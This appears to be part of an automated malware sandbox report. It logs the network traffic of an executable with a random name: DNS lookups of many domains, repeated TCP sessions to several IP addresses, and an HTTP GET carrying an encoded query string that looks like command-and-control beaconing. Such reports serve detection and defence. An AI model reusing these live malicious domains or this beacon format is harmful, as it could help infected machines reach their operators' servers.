                          Jul 18, 2024 08:17:55.756566048 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.756639957 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:56.654558897 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.671310902 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.676459074 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:57.676537037 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.678827047 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.683922052 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:57.683938026 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.292809963 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.293035984 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.293086052 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:59.186569929 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.203238010 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.208331108 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.208424091 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.211462021 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.217499971 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.822619915 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.823582888 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.826690912 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.833055019 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.838063955 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:06.170804024 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.175941944 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.176511049 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.178093910 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.183739901 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824328899 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824666023 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824901104 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:07.683217049 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.701838970 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.709564924 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:08.709701061 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.711636066 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.716677904 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.324654102 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.326689005 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.326767921 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:10.214411020 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.233186960 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.246686935 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.246767044 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.248905897 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.255764961 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.255778074 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881146908 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881282091 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881552935 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:12.761316061 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.782610893 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.788152933 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:13.790674925 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.794574976 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.799437046 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.452423096 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.453058004 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.453133106 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:14.458321095 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:14.463706970 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:36.090595961 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.095510960 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.098733902 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.102586031 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.107716084 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.734452963 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737665892 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737716913 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.737797022 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737843037 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:37.605235100 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.626563072 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.631634951 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:38.632774115 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.635194063 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.640106916 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.267457962 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.270921946 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.270967960 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:39.271173000 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.271222115 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:40.136622906 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.155662060 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.160835028 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.160919905 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.163125038 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.167994022 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.168015003 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.797302008 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.800997019 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.801068068 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.801176071 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:42.669421911 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.686786890 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.704982996 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:43.706787109 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.710582972 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.718113899 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.340939045 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353832960 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353916883 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353924036 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354120016 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.354181051 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354187012 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354304075 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354332924 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.354738951 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.359829903 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.364761114 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:49.397089958 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.401922941 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.402000904 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.409929991 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.417939901 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.925992012 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.926119089 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.928508043 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:50.917727947 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.938596010 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.943465948 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:51.946760893 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.948964119 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.953777075 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810693026 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810719013 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810729980 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810739994 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810772896 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:52.810810089 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:53.464473009 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.484971046 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.489892960 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:54.493709087 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.496222019 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.501504898 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:54.501514912 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043245077 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043332100 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043395996 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:56.011464119 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.030039072 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.036252975 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.036463976 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.038337946 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.043263912 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.569361925 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.569850922 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.570305109 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.572304964 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.577570915 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:19:02.656075954 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.665448904 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:02.665518999 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.667402983 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.672384977 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581211090 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581224918 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581233025 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581276894 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:03.581711054 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581717968 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581795931 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:04.183372974 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.201809883 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.206773043 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:05.206876993 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.208739996 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.213747025 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130501986 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130536079 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130547047 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130590916 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.130780935 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130795002 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130815983 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.130836964 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.714589119 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.733175993 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.738199949 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:07.738743067 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.742604971 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.747450113 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:07.747648001 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617599010 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617615938 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617628098 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617676973 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:08.617760897 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617773056 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617799044 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:08.617834091 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:09.246792078 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.266299009 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.271214008 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:10.271286964 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.273647070 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.278814077 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204243898 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204299927 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204312086 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204619884 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204632998 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204643965 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204651117 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204667091 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.204817057 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.205100060 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205136061 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205142021 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205435991 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.208642006 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.208857059 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.212639093 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.217627048 CEST8049742154.92.52.196192.168.2.9

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 18, 2024 08:15:50.040218115 CEST5036853192.168.2.91.1.1.1
                          Jul 18, 2024 08:15:50.060420990 CEST53503681.1.1.1192.168.2.9
                          Jul 18, 2024 08:15:55.077122927 CEST4990653192.168.2.91.1.1.1
                          Jul 18, 2024 08:15:55.321600914 CEST53499061.1.1.1192.168.2.9
                          Jul 18, 2024 08:16:10.920753956 CEST5856553192.168.2.91.1.1.1
                          Jul 18, 2024 08:16:11.075464010 CEST53585651.1.1.1192.168.2.9
                          Jul 18, 2024 08:16:19.149816990 CEST6229253192.168.2.91.1.1.1
                          Jul 18, 2024 08:16:19.605364084 CEST53622921.1.1.1192.168.2.9
                          Jul 18, 2024 08:16:32.719049931 CEST6411553192.168.2.91.1.1.1
                          Jul 18, 2024 08:16:33.157087088 CEST53641151.1.1.1192.168.2.9
                          Jul 18, 2024 08:17:07.170677900 CEST6211953192.168.2.91.1.1.1
                          Jul 18, 2024 08:17:07.206608057 CEST53621191.1.1.1192.168.2.9
                          Jul 18, 2024 08:17:52.265343904 CEST6027953192.168.2.91.1.1.1
                          Jul 18, 2024 08:17:52.593069077 CEST53602791.1.1.1192.168.2.9
                          Jul 18, 2024 08:18:05.844610929 CEST5471953192.168.2.91.1.1.1
                          Jul 18, 2024 08:18:06.168313980 CEST53547191.1.1.1192.168.2.9
                          Jul 18, 2024 08:18:19.469306946 CEST5415553192.168.2.91.1.1.1
                          Jul 18, 2024 08:18:19.480040073 CEST53541551.1.1.1192.168.2.9
                          Jul 18, 2024 08:18:27.546855927 CEST6208953192.168.2.91.1.1.1
                          Jul 18, 2024 08:18:27.559072971 CEST53620891.1.1.1192.168.2.9
                          Jul 18, 2024 08:18:35.632174015 CEST6099353192.168.2.91.1.1.1
                          Jul 18, 2024 08:18:36.080327034 CEST53609931.1.1.1192.168.2.9
                          Jul 18, 2024 08:18:49.375050068 CEST5111353192.168.2.91.1.1.1
                          Jul 18, 2024 08:18:49.394747019 CEST53511131.1.1.1192.168.2.9
                          Jul 18, 2024 08:19:02.606623888 CEST5357653192.168.2.91.1.1.1
                          Jul 18, 2024 08:19:02.640912056 CEST53535761.1.1.1192.168.2.9
                          Jul 18, 2024 08:19:16.219278097 CEST5785553192.168.2.91.1.1.1
                          Jul 18, 2024 08:19:16.253170013 CEST53578551.1.1.1192.168.2.9

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 18, 2024 08:15:50.040218115 CEST192.168.2.91.1.1.10x42acStandard query (0)www.gospelstudygroup.orgA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:15:55.077122927 CEST192.168.2.91.1.1.10x2c01Standard query (0)www.valerieomage.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:10.920753956 CEST192.168.2.91.1.1.10x9f9Standard query (0)www.instantmailer.cloudA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:19.149816990 CEST192.168.2.91.1.1.10x1931Standard query (0)www.kosherphonestore.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:32.719049931 CEST192.168.2.91.1.1.10xa215Standard query (0)www.cwgehkk.storeA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:17:07.170677900 CEST192.168.2.91.1.1.10xcbe8Standard query (0)www.mybodyradar.netA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:17:52.265343904 CEST192.168.2.91.1.1.10x97adStandard query (0)www.lacemalt.topA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:05.844610929 CEST192.168.2.91.1.1.10xdf25Standard query (0)www.siteblogoficialon.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:19.469306946 CEST192.168.2.91.1.1.10x24ddStandard query (0)www.mcxright.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:27.546855927 CEST192.168.2.91.1.1.10x3ad5Standard query (0)www.amkmos.onlineA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:35.632174015 CEST192.168.2.91.1.1.10xfc38Standard query (0)www.mg55aa.xyzA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:49.375050068 CEST192.168.2.91.1.1.10xd849Standard query (0)www.lavillitadepapa.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:19:02.606623888 CEST192.168.2.91.1.1.10xd95bStandard query (0)www.csstoneoak.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:19:16.219278097 CEST192.168.2.91.1.1.10xf99eStandard query (0)www.gzlhysuess.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 18, 2024 08:15:50.060420990 CEST1.1.1.1192.168.2.90x42acName error (3)www.gospelstudygroup.orgnonenoneA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:15:55.321600914 CEST1.1.1.1192.168.2.90x2c01No error (0)www.valerieomage.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 08:15:55.321600914 CEST1.1.1.1192.168.2.90x2c01No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:11.075464010 CEST1.1.1.1192.168.2.90x9f9Name error (3)www.instantmailer.cloudnonenoneA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:19.605364084 CEST1.1.1.1192.168.2.90x1931No error (0)www.kosherphonestore.comwww.kosherphonestore.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 08:16:19.605364084 CEST1.1.1.1192.168.2.90x1931No error (0)www.kosherphonestore.com.cdn.hstgr.net84.32.84.101A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:16:33.157087088 CEST1.1.1.1192.168.2.90xa215No error (0)www.cwgehkk.store43.155.26.241A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:17:07.206608057 CEST1.1.1.1192.168.2.90xcbe8No error (0)www.mybodyradar.netmybodyradar.netCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 08:17:07.206608057 CEST1.1.1.1192.168.2.90xcbe8No error (0)mybodyradar.net3.33.130.190A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:17:07.206608057 CEST1.1.1.1192.168.2.90xcbe8No error (0)mybodyradar.net15.197.148.33A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:17:52.593069077 CEST1.1.1.1192.168.2.90x97adNo error (0)www.lacemalt.top203.161.55.102A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:06.168313980 CEST1.1.1.1192.168.2.90xdf25No error (0)www.siteblogoficialon.comsiteblogoficialon.comCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 08:18:06.168313980 CEST1.1.1.1192.168.2.90xdf25No error (0)siteblogoficialon.com108.179.193.98A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:19.480040073 CEST1.1.1.1192.168.2.90x24ddName error (3)www.mcxright.comnonenoneA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:27.559072971 CEST1.1.1.1192.168.2.90x3ad5Name error (3)www.amkmos.onlinenonenoneA (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:36.080327034 CEST1.1.1.1192.168.2.90xfc38No error (0)www.mg55aa.xyz35.241.34.216A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:18:49.394747019 CEST1.1.1.1192.168.2.90xd849No error (0)www.lavillitadepapa.com74.208.46.171A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:19:02.640912056 CEST1.1.1.1192.168.2.90xd95bNo error (0)www.csstoneoak.com154.92.52.196A (IP address)IN (0x0001)false
                          Jul 18, 2024 08:19:16.253170013 CEST1.1.1.1192.168.2.90xf99eName error (3)www.gzlhysuess.comnonenoneA (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.valerieomage.com
                          • www.kosherphonestore.com
                          • www.cwgehkk.store
                          • www.mybodyradar.net
                          • www.lacemalt.top
                          • www.siteblogoficialon.com
                          • www.mg55aa.xyz
                          • www.lavillitadepapa.com
                          • www.csstoneoak.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.94970923.227.38.7480692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:15:55.343617916 CEST530OUTGET /c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.valerieomage.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:15:55.872169018 CEST1236INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:15:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Sorting-Hat-PodId: 223
                          X-Sorting-Hat-ShopId: 70582403296
                          X-Storefront-Renderer-Rendered: 1
                          location: https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0
                          x-redirect-reason: https_required
                          x-frame-options: DENY
                          content-security-policy: frame-ancestors 'none';
                          x-shopid: 70582403296
                          x-shardid: 223
                          vary: Accept
                          powered-by: Shopify
                          server-timing: processing;dur=14;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="jq9q", requestID;desc="c3f5f2dd-320e-453b-a4d9-b5695d83d990-1721283355"
                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                          x-request-id: c3f5f2dd-320e-453b-a4d9-b5695d83d990-1721283355
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gwioh%2FAPthmTmSzJgxWYy3nuzSEURtWAawZgmwZ5WwVGF0HVKvpwx0OUTJbZeGGnSQjLTNemKqFgY%2Bq4crL9y7qdLda3Y%2FZmIFrayC12DIihTNlS8U5GToX4e0CyXjE8q9g6RmWl"}],"group":"cf-nel","max_age":604800}
                          NEL: {"
                          Data Raw:
                          Data Ascii:
                          Jul 18, 2024 08:15:55.872703075 CEST332INData Raw: 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71
